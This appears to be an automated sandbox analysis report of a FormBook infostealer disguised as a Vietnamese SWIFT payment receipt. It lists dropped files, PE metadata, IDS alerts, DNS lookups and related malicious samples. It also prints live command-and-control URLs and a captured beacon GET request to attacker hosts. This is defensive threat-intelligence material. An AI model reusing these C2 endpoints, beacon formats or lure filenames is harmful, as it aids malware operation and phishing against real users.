Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:21:53	API Interceptor	1x Sleep call for process: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe modified
03:21:59	API Interceptor	11x Sleep call for process: powershell.exe modified
03:22:00	API Interceptor	1330122x Sleep call for process: explorer.exe modified
03:22:47	API Interceptor	1803349x Sleep call for process: colorcpl.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.148.106.70	Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Get hash	malicious	FormBook	Browse	www.loyalbahis356.com/pz12/?XvRxR=rTfdhh5hH2&NBtT=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/+38lrQrf/b9xTaJsLm+Z3/RBaY9L1MEhp7dpaA
188.114.96.3	z4Nuevalistaadjunta.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.coinwab.com/kqqj/
	ACCEPT_014STSY529093.PDF.exe	Get hash	malicious	Azorult	Browse	l0h5.shop/CM341/index.php
	Ticari Siparis Belgesi 07 08 2024 18545075600_pdf.exe	Get hash	malicious	FormBook	Browse	www.jnhdh8827.com/pz12/?Fvt=tXrQrgXPfQCqrAqcdoT/KCxiftMWx+uc6jO1VE/0fl1BeE1n2goaTZbQHXLLcLIs9Jvq&3fMpsD=BfiHV2ph_4
	Payment advice.exe	Get hash	malicious	FormBook	Browse	www.aggame.asia/0dmj/
	709282738372873.exe	Get hash	malicious	FormBook	Browse	www.coinwab.com/kqqj/
	Document 240000807.exe	Get hash	malicious	FormBook	Browse	www.lampgm.pro/em9t/
	http://cs2024-cs.fdabv.com/	Get hash	malicious	Unknown	Browse	cs2024-cs.fdabv.com/
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/HPg28kQA/download
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/7wFhpez4/download
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/jdxFnPJT/download

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.loyalbahis356.com	Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Get hash	malicious	FormBook	Browse	185.148.106.70
www.loyalbahis356.com	Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe	Get hash	malicious	FormBook	Browse	185.148.106.71
www.jnhdh8827.com	Ticari Siparis Belgesi 07 08 2024 18545075600_pdf.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	rFormulariodeso.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	188.114.96.3
	Steel pipes material data sheets Bill of Quantity Valves chemicals KM C654e21011710050.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	188.114.96.3
	Material data sheets Bill of Quantity Steel pipes and chemicals KM C654e21011710050.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	188.114.96.3
	Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe	Get hash	malicious	FormBook	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TESONETLT	Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Get hash	malicious	FormBook	Browse	185.148.106.70
	INVOICE - MV CNC BANGKOK - ST24PJ-278.exe	Get hash	malicious	FormBook	Browse	156.67.74.121
	Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe	Get hash	malicious	FormBook	Browse	185.148.106.71
	http://www.open-sora.org	Get hash	malicious	Exela Stealer, Growtopia, Python Stealer	Browse	156.67.75.29
	OPs5j7Yjb8.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.67.72.41
	52cMXV8Al2.elf	Get hash	malicious	Mirai	Browse	156.67.72.45
	mips.elf	Get hash	malicious	Mirai, Moobot	Browse	195.158.206.227
	TAVMCtVXa5.exe	Get hash	malicious	Unknown	Browse	156.67.72.10
	kn328E7C2B.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, SmokeLoader, Stealc	Browse	156.67.71.68
	#U0111#U01a1n h#U00e0ng m#U1edbi pdf.exe	Get hash	malicious	FormBook	Browse	156.67.71.229
CLOUDFLARENETUS	Vessel Particulars.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	DHL Shipment Documents_1338078651.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	DHL AirWayBill.pif.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	DHL Shipment Doc.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Bank Slip.xls	Get hash	malicious	Unknown	Browse	172.67.162.208
	Bank Slip.xls	Get hash	malicious	Unknown	Browse	172.67.162.208
	invoice727282_PDF..exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	HBL-08082024-RELEASE.xls	Get hash	malicious	Unknown	Browse	172.67.162.208
	DHL_AWB#6078538091.exe	Get hash	malicious	FormBook	Browse	172.67.195.73
	Bank Slip.xls	Get hash	malicious	Unknown	Browse	172.67.162.208
HWCSNETHuaweiCloudServicedatacenterCN	unLc6VekkL.elf	Get hash	malicious	Mirai	Browse	121.36.93.241
	Tomcat.bin.exe	Get hash	malicious	Unknown	Browse	124.70.37.167
	b4cbf3ffbd8e152116e72487c3b16f1d.exe	Get hash	malicious	Unknown	Browse	124.70.37.167
	Tomcat.bin.exe	Get hash	malicious	Unknown	Browse	124.70.37.167
	b4cbf3ffbd8e152116e72487c3b16f1d.exe	Get hash	malicious	Unknown	Browse	124.70.37.167
	Tomcat.bin.exe	Get hash	malicious	Unknown	Browse	124.70.37.167
	1I9EGoBq.exe	Get hash	malicious	Unknown	Browse	124.70.37.167
	Tomcat.bin.exe	Get hash	malicious	Unknown	Browse	124.70.37.167
	1I9EGoBq.exe	Get hash	malicious	Unknown	Browse	124.70.37.167
	SecuriteInfo.com.Win32.Evo-gen.1535.2335.exe	Get hash	malicious	Supershell	Browse	121.36.248.151

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.log

Download File

Process:	C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:ML9E4KiE4Kx1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MxHKiHKx1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	8B21C0FDF91680677FEFC8890882FD1F
SHA1:	E15AC7685BFC89F63015C29DE7F6BCE7A1A9F0E7
SHA-256:	E2F188397C73C8150EE6F09E833E4D1ABA01293CCFDFED61981F5F66660731F9
SHA-512:	1EFDF56115A8688CA2380F3047A28CA3E03C74369C3A377050066A56B8171AD756F7DD7AA29F5648A84D16812D1B422749259ED47447713E9B3A0834CE361BE7
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1172
Entropy (8bit):	5.356731422178564
Encrypted:	false
SSDEEP:	24:3CytZWSKco4KmZjKbmOIKod6emN1s4RP09tEoUEJ0gt/NKIl9iagu:yyjWSU4xympjms4Rc9tEoUl8NDv
MD5:	480203CD49438F23FB257730E22AB496
SHA1:	B1A553D2251E16878277A7D246D1944073E9D3D6
SHA-256:	6476EE14832C3738B8D1BB4BF5CB6C9E967F37DFE286D7184BC097E4532FC6B7
SHA-512:	010F9CECA85C766BA599B648C74A13F928AD88D5DF9F8D2A4CF080DB14B4B6FC7D155D66AD489F6DFC48F17532FB82348B954F8446040944455C37955FE47A0D
Malicious:	false
Reputation:	low
Preview:	@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<...............V.}...@...i...........System.Transactions.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3z24q121.xny.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_540tlhfv.v01.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qn4nmjjf.ku2.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yqurixrq.wpr.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.857886206893674
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe
File size:	789'504 bytes
MD5:	15cc82dce96d6980e2dc800b10a81495
SHA1:	005a539c30f4a640457dcd8b047278e8a93dd61b
SHA256:	7d39dde72383a557950523dfc9e5a64718323fcebf5d41aba286763c9ae7b39e
SHA512:	5ceaf03a2187dd14f793d278730f17b5a4fe907d57a319fb512fc6ad686e49d06d9f6d57b98261b54c2c37397f4b0661c954cea2f07acccb560a51f82d6921e3
SSDEEP:	12288:l8RMecnVV0TWQwZnBLhDqV/NX7WsfuyP1S3dktl8IfWoK811zF2JraZlJCjWcRQc:+43NdsVpWUQatlPlcJclJtcu
TLSH:	5DF401493680AC9FC65F8D3E89612C409B71E166560FE353B89736FC588E3E68E413E7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....9.f..............0......$......n.... ... ....@.. ....................................@................................

File Icon


Icon Hash:	6d52d2adc7a9a944

Static PE Info

General

Entrypoint:	0x4c056e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66B439B5 [Thu Aug 8 03:21:25 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc0518	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc2000	0x2158	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc6000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xbe574	0xbe600	9c88d65fbeaec9c1a224690b32470fac	False	0.8987978598982271	Hitachi SH little-endian COFF executable, no relocation info, stripped, 12 sections, symbol offset=0x48, 327682 symbols, optional header size 5696	7.8646973020800965	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc2000	0x2158	0x2200	d4177ce5b36c2f2801c579d54624d391	False	0.8836167279411765	data	7.4086789574410306	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc6000	0xc	0x200	d19d0fff50418b1e0e6fe9d638e0167b	False	0.041015625	data	0.07763316234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xc20e8	0x1d49	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9618514072295585
RT_GROUP_ICON	0xc3e34	0x14	data	1.05
RT_VERSION	0xc3e48	0x310	data	0.4375

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-09T09:23:41.928739+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	50152	80	192.168.2.6	188.114.96.3
2024-08-09T09:23:06.633806+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	50149	80	192.168.2.6	119.3.37.137
2024-08-09T09:22:41.789121+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	50146	80	192.168.2.6	185.148.106.70

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 9, 2024 09:22:41.316875935 CEST	50146	80	192.168.2.6	185.148.106.70
Aug 9, 2024 09:22:41.322092056 CEST	80	50146	185.148.106.70	192.168.2.6
Aug 9, 2024 09:22:41.322318077 CEST	50146	80	192.168.2.6	185.148.106.70
Aug 9, 2024 09:22:41.322381973 CEST	50146	80	192.168.2.6	185.148.106.70
Aug 9, 2024 09:22:41.327379942 CEST	80	50146	185.148.106.70	192.168.2.6
Aug 9, 2024 09:22:41.788503885 CEST	80	50146	185.148.106.70	192.168.2.6
Aug 9, 2024 09:22:41.788662910 CEST	50146	80	192.168.2.6	185.148.106.70
Aug 9, 2024 09:22:41.789066076 CEST	80	50146	185.148.106.70	192.168.2.6
Aug 9, 2024 09:22:41.789120913 CEST	50146	80	192.168.2.6	185.148.106.70
Aug 9, 2024 09:22:41.793857098 CEST	80	50146	185.148.106.70	192.168.2.6
Aug 9, 2024 09:23:02.614479065 CEST	50149	80	192.168.2.6	119.3.37.137
Aug 9, 2024 09:23:02.619443893 CEST	80	50149	119.3.37.137	192.168.2.6
Aug 9, 2024 09:23:02.619560957 CEST	50149	80	192.168.2.6	119.3.37.137
Aug 9, 2024 09:23:02.619622946 CEST	50149	80	192.168.2.6	119.3.37.137
Aug 9, 2024 09:23:02.626486063 CEST	80	50149	119.3.37.137	192.168.2.6
Aug 9, 2024 09:23:03.118621111 CEST	50149	80	192.168.2.6	119.3.37.137
Aug 9, 2024 09:23:03.167359114 CEST	80	50149	119.3.37.137	192.168.2.6
Aug 9, 2024 09:23:06.633038998 CEST	80	50149	119.3.37.137	192.168.2.6
Aug 9, 2024 09:23:06.633805990 CEST	50149	80	192.168.2.6	119.3.37.137
Aug 9, 2024 09:23:41.412947893 CEST	50152	80	192.168.2.6	188.114.96.3
Aug 9, 2024 09:23:41.417874098 CEST	80	50152	188.114.96.3	192.168.2.6
Aug 9, 2024 09:23:41.418183088 CEST	50152	80	192.168.2.6	188.114.96.3
Aug 9, 2024 09:23:41.418183088 CEST	50152	80	192.168.2.6	188.114.96.3
Aug 9, 2024 09:23:41.423177958 CEST	80	50152	188.114.96.3	192.168.2.6
Aug 9, 2024 09:23:41.921128035 CEST	50152	80	192.168.2.6	188.114.96.3
Aug 9, 2024 09:23:41.928667068 CEST	80	50152	188.114.96.3	192.168.2.6
Aug 9, 2024 09:23:41.928739071 CEST	50152	80	192.168.2.6	188.114.96.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 9, 2024 09:22:14.522846937 CEST	53	58300	1.1.1.1	192.168.2.6
Aug 9, 2024 09:22:40.985940933 CEST	52530	53	192.168.2.6	1.1.1.1
Aug 9, 2024 09:22:41.306299925 CEST	53	52530	1.1.1.1	192.168.2.6
Aug 9, 2024 09:23:01.546960115 CEST	59644	53	192.168.2.6	1.1.1.1
Aug 9, 2024 09:23:02.561712980 CEST	59644	53	192.168.2.6	1.1.1.1
Aug 9, 2024 09:23:02.613589048 CEST	53	59644	1.1.1.1	192.168.2.6
Aug 9, 2024 09:23:02.614260912 CEST	53	59644	1.1.1.1	192.168.2.6
Aug 9, 2024 09:23:21.109503031 CEST	61804	53	192.168.2.6	1.1.1.1
Aug 9, 2024 09:23:21.275454998 CEST	53	61804	1.1.1.1	192.168.2.6
Aug 9, 2024 09:23:41.240724087 CEST	53053	53	192.168.2.6	1.1.1.1
Aug 9, 2024 09:23:41.411881924 CEST	53	53053	1.1.1.1	192.168.2.6
Aug 9, 2024 09:24:04.187411070 CEST	61611	53	192.168.2.6	1.1.1.1
Aug 9, 2024 09:24:04.938110113 CEST	53	61611	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 9, 2024 09:22:40.985940933 CEST	192.168.2.6	1.1.1.1	0x201e	Standard query (0)	www.loyalbahis356.com	A (IP address)	IN (0x0001)	false
Aug 9, 2024 09:23:01.546960115 CEST	192.168.2.6	1.1.1.1	0x16c6	Standard query (0)	www.guangdongqiangzhetc.com	A (IP address)	IN (0x0001)	false
Aug 9, 2024 09:23:02.561712980 CEST	192.168.2.6	1.1.1.1	0x16c6	Standard query (0)	www.guangdongqiangzhetc.com	A (IP address)	IN (0x0001)	false
Aug 9, 2024 09:23:21.109503031 CEST	192.168.2.6	1.1.1.1	0x2414	Standard query (0)	www.nuevobajonfavorito.com	A (IP address)	IN (0x0001)	false
Aug 9, 2024 09:23:41.240724087 CEST	192.168.2.6	1.1.1.1	0x115a	Standard query (0)	www.jnhdh8827.com	A (IP address)	IN (0x0001)	false
Aug 9, 2024 09:24:04.187411070 CEST	192.168.2.6	1.1.1.1	0x1854	Standard query (0)	www.ma-google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 9, 2024 09:22:41.306299925 CEST	1.1.1.1	192.168.2.6	0x201e	No error (0)	www.loyalbahis356.com		185.148.106.70	A (IP address)	IN (0x0001)	false
Aug 9, 2024 09:22:41.306299925 CEST	1.1.1.1	192.168.2.6	0x201e	No error (0)	www.loyalbahis356.com		185.148.106.71	A (IP address)	IN (0x0001)	false
Aug 9, 2024 09:23:02.613589048 CEST	1.1.1.1	192.168.2.6	0x16c6	No error (0)	www.guangdongqiangzhetc.com	www-guangdongqiangzhetc-com.258fuwu.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 9, 2024 09:23:02.613589048 CEST	1.1.1.1	192.168.2.6	0x16c6	No error (0)	www-guangdongqiangzhetc-com.258fuwu.com		119.3.37.137	A (IP address)	IN (0x0001)	false
Aug 9, 2024 09:23:02.614260912 CEST	1.1.1.1	192.168.2.6	0x16c6	No error (0)	www.guangdongqiangzhetc.com	www-guangdongqiangzhetc-com.258fuwu.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 9, 2024 09:23:02.614260912 CEST	1.1.1.1	192.168.2.6	0x16c6	No error (0)	www-guangdongqiangzhetc-com.258fuwu.com		119.3.37.137	A (IP address)	IN (0x0001)	false
Aug 9, 2024 09:23:21.275454998 CEST	1.1.1.1	192.168.2.6	0x2414	Name error (3)	www.nuevobajonfavorito.com	none	none	A (IP address)	IN (0x0001)	false
Aug 9, 2024 09:23:41.411881924 CEST	1.1.1.1	192.168.2.6	0x115a	No error (0)	www.jnhdh8827.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 9, 2024 09:23:41.411881924 CEST	1.1.1.1	192.168.2.6	0x115a	No error (0)	www.jnhdh8827.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 9, 2024 09:24:04.938110113 CEST	1.1.1.1	192.168.2.6	0x1854	Name error (3)	www.ma-google.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.loyalbahis356.com

www.guangdongqiangzhetc.com

www.jnhdh8827.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	50146	185.148.106.70	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 09:22:41.322381973 CEST	184	OUT	GET /pz12/?tX9tN=1bMtYrqh7B54XFQP&uTm4D=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/+38lrQrf/b9xTaJsLm+Z3/RBaY9L5MXxl4E5aW6imDag== HTTP/1.1 Host: www.loyalbahis356.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
